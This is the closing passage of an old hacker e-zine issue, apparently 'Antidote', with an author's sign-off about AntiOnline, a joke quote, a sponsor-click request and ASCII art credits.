before copying this WHOLE AntiOnline document and not giving credit where it is due.
Again, I am sorry to those who like AntiOnline and go there and wanted to read this
document. But you have your opinions so please let me have mine (if you wanna think
this is an opinion).
Lord Oak
lordoak@thepoison.org
------------------------------
SAY.W
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
. Quote #2- .
. .
. "Comeon guys, stop it or I am telling!" .
. -JayPeeAychEf (JPHF) .
. .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Please go to: www.thepoison.org/popup.html and click on our sponsors because we have to
pay the bills someway! It doesn't cost you anything (except 10 seconds) to go there and
click on it.
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
_| _|
_| _| _| _| _| _| _| _|
_| _| _| _|_| _| _|_| _| _|
_| _|_|_|_| _| _| _| _| _| _| _|
_| _| _| _| _|_| _| _|_| _|
_| _| _| _| _| _| _| _|
_| Antidote is an HNN Affiliate _|
_| http://www.hackernews.com _|
_| _|
_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|
All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and permission
is needed before using.